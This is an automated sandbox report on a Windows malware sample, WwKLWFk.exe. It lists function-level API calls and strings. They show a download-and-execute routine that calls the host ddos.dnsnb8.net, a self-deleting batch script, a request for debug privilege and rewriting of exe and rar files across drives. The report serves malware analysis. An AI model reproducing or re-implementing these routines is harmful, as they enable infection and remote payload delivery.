Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: 3987b18cab2624a4059152f6a4c60332a2849c2c2861283ff6aff073ba4fde99
Instruction ID: 2dbfc4fa9aad6c81e8a4779b8bb0a7611b1ec4670bdb4df708e707af61fb93e9
Opcode Fuzzy Hash: 3987b18cab2624a4059152f6a4c60332a2849c2c2861283ff6aff073ba4fde99
Instruction Fuzzy Hash: 314181B2405349AFD721EBA0DC89FDB77ECEB85746F0408A9F944C3151EA30D64C8BA2

Function 00B51718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B51729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00B5174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00B5177C
__aulldiv.LIBCMT ref: 00B51796
__aulldiv.LIBCMT ref: 00B517A8

Strings

Time, xrefs: 00B5173D, 00B51766
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B51722
SOFTWARE\GTplus, xrefs: 00B51742, 00B5176B

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-923351284
Opcode ID: 1f2d8708c3f2d9981c56fab86f20403ec05992cc0371fa71af6658b31862be0d
Instruction ID: 604c5e099507b478afc65bae4e13ff9a2a4f2b03fee879bd162025add7daf2a4
Opcode Fuzzy Hash: 1f2d8708c3f2d9981c56fab86f20403ec05992cc0371fa71af6658b31862be0d
Instruction Fuzzy Hash: A31151B1A00209BBDB109BA8C885FAE7BF8EB44B56F1085D5FD01B6281D6719E48CB64

Function 00B56076 Relevance: 11.1, APIs: 7, Instructions: 617
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00001800,00001000,00000004), ref: 00B560BE
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 00B560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00B56189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B561A5

Memory Dump Source

Source File: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f358f1d0664c73a22a1f60fea8056d02ed66a49ec2b197f469e73eb5277bd738
Instruction ID: 9ac0ae5fddcb5060cc7fb50cdd0c613f79f7aabb0e87873c6581e8ec1af0738d
Opcode Fuzzy Hash: f358f1d0664c73a22a1f60fea8056d02ed66a49ec2b197f469e73eb5277bd738
Instruction Fuzzy Hash: AE1247B25087848FDB328F24CC85BEA7BF0EF12311F9845DDDD858B292D674A909CB55

Function 00B51E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNELBASE(00B52597,00000080,00B52597,00B532B0,00000164,00B52986,?), ref: 00B51EB9
CreateFileA.KERNELBASE(00B52597,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00B51ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00B51EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00B51F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00B51F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00B5201E
memset.MSVCRT ref: 00B520D8
memset.MSVCRT ref: 00B520EA
memcpy.MSVCRT ref: 00B5222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B52238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B5224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522DD
WriteFile.KERNEL32(000000FF,00B54008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B522F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B5230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B52322
UnmapViewOfFile.KERNEL32(?,00B52597,00B532B0,00000164,00B52986,?), ref: 00B52340
CloseHandle.KERNEL32(?,00B52597,00B532B0,00000164,00B52986,?), ref: 00B5234E
CloseHandle.KERNEL32(000000FF,00B52597,00B532B0,00000164,00B52986,?), ref: 00B52359

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3043204753-0
Opcode ID: 38e991154d1d595e3848a9e6f2c580a1a2b81ae6db016a6a57c6578706798bef
Instruction ID: f95369e1c70144859f6a264915255c42713951d84a0588712fdfd3127a96f7f6
Opcode Fuzzy Hash: 38e991154d1d595e3848a9e6f2c580a1a2b81ae6db016a6a57c6578706798bef
Instruction Fuzzy Hash: 10F15871901208EFCB20DFA8D881BADBBF5FF09316F1045A9E909A72A1D730AD85CF54

Function 00B5274A Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00B52766
memset.MSVCRT ref: 00B52774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00B52787
wsprintfA.USER32 ref: 00B527AB

Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894

wsprintfA.USER32 ref: 00B527C6
CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\50ed6d56.exe,00000000), ref: 00B527D4
wsprintfA.USER32 ref: 00B527F4

Part of subcall function 00B51973: PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
Part of subcall function 00B51973: CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
Part of subcall function 00B51973: Sleep.KERNEL32(00000064), ref: 00B519C6
Part of subcall function 00B51973: wsprintfA.USER32 ref: 00B519EC
Part of subcall function 00B51973: CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
Part of subcall function 00B51973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
Part of subcall function 00B51973: GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
Part of subcall function 00B51973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
Part of subcall function 00B51973: ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65

DeleteFileA.KERNEL32(?,?,00B54E54,00B54E58), ref: 00B5281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00B54E54,00B54E58), ref: 00B52832

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B527B6
c_31892.nls, xrefs: 00B527DE
C:\Users\user\AppData\Local\Temp\50ed6d56.exe, xrefs: 00B527C0, 00B527C5, 00B527CC
\WinRAR\Rar.exe, xrefs: 00B52793
%s%.8x.exe, xrefs: 00B527BB
C:\Windows\system32, xrefs: 00B527E3
%s%s, xrefs: 00B527A5
%s\%s, xrefs: 00B527EE

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-4029383994
Opcode ID: 758f1645c6d9e930e2fbb713a21255efb752cec19bacd27d69169bc3326293a1
Instruction ID: 14f8d796dc444a06c8ebbd05be9225cb89a1379ebf53b14cdf10aa9932084c4b
Opcode Fuzzy Hash: 758f1645c6d9e930e2fbb713a21255efb752cec19bacd27d69169bc3326293a1
Instruction Fuzzy Hash: B32153B694031C7BEB10E7A49C89FDB73ECDB04B4AF4405E1BA44E3151E6709F888AA0

Function 00B51973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.KERNELBASE(00B54E54,77068400,00000000), ref: 00B51992
CreateFileA.KERNELBASE(00B54E54,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\50ed6d56.exe), ref: 00B519BA
Sleep.KERNEL32(00000064), ref: 00B519C6
wsprintfA.USER32 ref: 00B519EC
CopyFileA.KERNEL32(00B54E54,?,00000000), ref: 00B51A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B51A1E
GetFileSize.KERNEL32(00B54E54,00000000), ref: 00B51A2C
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00B51A46
ReadFile.KERNELBASE(00B54E54,00B54E58,00000000,?,00000000), ref: 00B51A65
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00B51A90
DeleteFileA.KERNEL32(?), ref: 00B51AA7
VirtualFree.KERNEL32(00B54E58,00000000,00008000), ref: 00B51AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B519DB
%s%.8X.data, xrefs: 00B519E6
2, xrefs: 00B519CF
C:\Users\user\AppData\Local\Temp\50ed6d56.exe, xrefs: 00B519A6

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\50ed6d56.exe
API String ID: 2523042076-3885149054
Opcode ID: 70462fd6123787db91fcc21a880e032319fe49348e44c2982dba4a5ba77d9257
Instruction ID: 662ada9450322dbe55ffa9f145ffa959e5f2797aa457b7df49741b995a0d98ce
Opcode Fuzzy Hash: 70462fd6123787db91fcc21a880e032319fe49348e44c2982dba4a5ba77d9257
Instruction Fuzzy Hash: 21515E71901219EFCB129F98CC84BAEBBF8EB04756F1449E9F925E2290C7309E48CB50

Function 00B528B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00B528D3
wsprintfA.USER32 ref: 00B528F7
memset.MSVCRT ref: 00B52925
wsprintfA.USER32 ref: 00B52940

Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52A02
Part of subcall function 00B529E2: wsprintfA.USER32 ref: 00B52A1A
Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52A44
Part of subcall function 00B529E2: lstrlen.KERNEL32(?), ref: 00B52A54
Part of subcall function 00B529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00B52A6C
Part of subcall function 00B529E2: strrchr.MSVCRT ref: 00B52A7C
Part of subcall function 00B529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00B52A9F
Part of subcall function 00B529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00B52AAE
Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52AC6
Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52ADA
Part of subcall function 00B529E2: FindFirstFileA.KERNELBASE(?,?), ref: 00B52AEF
Part of subcall function 00B529E2: memset.MSVCRT ref: 00B52B13

strrchr.MSVCRT ref: 00B52959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00B52974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B529B3
rar, xrefs: 00B52988
%s\, xrefs: 00B5293A
%s%s, xrefs: 00B528F1
exe, xrefs: 00B5296D

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1101464738
Opcode ID: 5dc7ca263002c850e652c41e0ebfe09ed1d5a694ff1864245f6fdc8cde988553
Instruction ID: 75614b8093a809646dc4696b5436f47b0d70a6e452a44ce6dce7a1ae1ceb701c
Opcode Fuzzy Hash: 5dc7ca263002c850e652c41e0ebfe09ed1d5a694ff1864245f6fdc8cde988553
Instruction Fuzzy Hash: DD31A77194130D6BEB20A764DC85FDA77ECDF16752F0404E2FD45A3281EAB59ACC8B60

Function 00B51099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894

WinExec.KERNEL32(?,00000005), ref: 00B510F1
lstrlen.KERNEL32(00B54748), ref: 00B510FA
wsprintfA.USER32 ref: 00B5112A
wsprintfA.USER32 ref: 00B51143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00B5115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00B51169
Sleep.KERNEL32 ref: 00B51179

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B51119
cj/, xrefs: 00B51135
http://%s:%d/%s/%s, xrefs: 00B510C2, 00B51141
%s%.8X.exe, xrefs: 00B51124
ddos.dnsnb8.net, xrefs: 00B510C8, 00B510CF, 00B51140, 00B51168

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-1863643174
Opcode ID: 217512159a5739256db02fe7df237867b9146deca8386d8d098f21f62a81f8f7
Instruction ID: 3cfce0ae4edb15e6d3f775254a5983e6b7f4709f829ba3e5307cf964fc0ce787
Opcode Fuzzy Hash: 217512159a5739256db02fe7df237867b9146deca8386d8d098f21f62a81f8f7
Instruction Fuzzy Hash: 6F216B75900308BEDB21ABA4DC49BAEBBF8EB0575BF1544D5E900A3150DB749A888FA0

Function 00B51581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B5185B: GetSystemTimeAsFileTime.KERNEL32(?,?,77068400,00000000,?,?,?,00B527B5), ref: 00B51867
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51878
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51880
Part of subcall function 00B5185B: srand.MSVCRT ref: 00B51890
Part of subcall function 00B5185B: rand.MSVCRT ref: 00B51894

wsprintfA.USER32 ref: 00B515AA
wsprintfA.USER32 ref: 00B515C6
lstrlen.KERNEL32(?), ref: 00B515D2
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00B515EE
WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00B51609
CloseHandle.KERNEL32(00000000), ref: 00B51612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00B5162D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B51599
%s%.8x.bat, xrefs: 00B515A4
open, xrefs: 00B51627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00B515C0
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B5158A, 00B515B3, 00B515B8, 00B515B9

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$open
API String ID: 617340118-3809860907
Opcode ID: f57bfe833e3e33bd2716cdbd297b05eed2f6a8e529113824c565e461a32f21d3
Instruction ID: b10402fe7a3db76687894954994b0dfe7c8a687d493a4b56ba52d85c7421c0a7
Opcode Fuzzy Hash: f57bfe833e3e33bd2716cdbd297b05eed2f6a8e529113824c565e461a32f21d3
Instruction Fuzzy Hash: 081154729012287AD72097A59C89FEB7AECDF59B92F0404D1F949E3150DE749B88CBB0

Function 00B51638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00B5164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00B5165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\WwKLWFk.exe,00000104), ref: 00B5166E
CreateThread.KERNELBASE(00000000,00000000,00B51099,00000000,00000000,00000000), ref: 00B516AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00B516BD

Part of subcall function 00B5139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B513BC
Part of subcall function 00B5139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B513DA
Part of subcall function 00B5139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B51448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\WwKLWFk.exe), ref: 00B516E5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00B51644
C:\Users\user\AppData\Local\Temp\WwKLWFk.exe, xrefs: 00B51662, 00B51667, 00B516DD
Documents and Settings, xrefs: 00B51696
C:\Windows\system32, xrefs: 00B51656

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WwKLWFk.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-3214399340
Opcode ID: b6c525920c75a2d6ed213f124f2666f435cbb0c98bb82a67edaf2c5de1c93f05
Instruction ID: a67c7471cad224f852b42ede204463d0a1a018a10cc84c83fde9bd7a1ea2d586
Opcode Fuzzy Hash: b6c525920c75a2d6ed213f124f2666f435cbb0c98bb82a67edaf2c5de1c93f05
Instruction Fuzzy Hash: 4211D6725413147BDF616BAC9D49F9B3EEDEB057A7F0404D0FA09921E0CA718988CBA1

Function 00B51000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,77068400,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00B51038
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B51075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B510E8,?), ref: 00B5108E

Strings

http://%s:%d/%s/%s, xrefs: 00B51000
ddos.dnsnb8.net, xrefs: 00B51026

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 38a22c2be5db90db54f2ada583bd33bb10647c5ba4b796a6b4de4fbfd121d2b9
Instruction ID: 7f69e805e109564fe83125617571c3ba593d2baf6e3a554d3226303cd542ef43
Opcode Fuzzy Hash: 38a22c2be5db90db54f2ada583bd33bb10647c5ba4b796a6b4de4fbfd121d2b9
Instruction Fuzzy Hash: 3401127150035DBFE6216F649C88F2B7BECDB44BDAF0849A9B645A31D0DA705E448A60

Function 00B52B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00B52BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00B52BB4
GetDriveTypeA.KERNELBASE(?), ref: 00B52BD3
CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00B52BEE
lstrlen.KERNEL32(?), ref: 00B52BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00B52C16
CreateThread.KERNELBASE(00000000,00000000,Function_00002845,00000000,00000000,00000000), ref: 00B52C3A

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000016.00000002.1648115372.0000000000B50000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648177006.0000000000B53000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648526944.0000000000B54000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.1648575700.0000000000B56000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_b50000_WwKLWFk.jbxd

Similarity

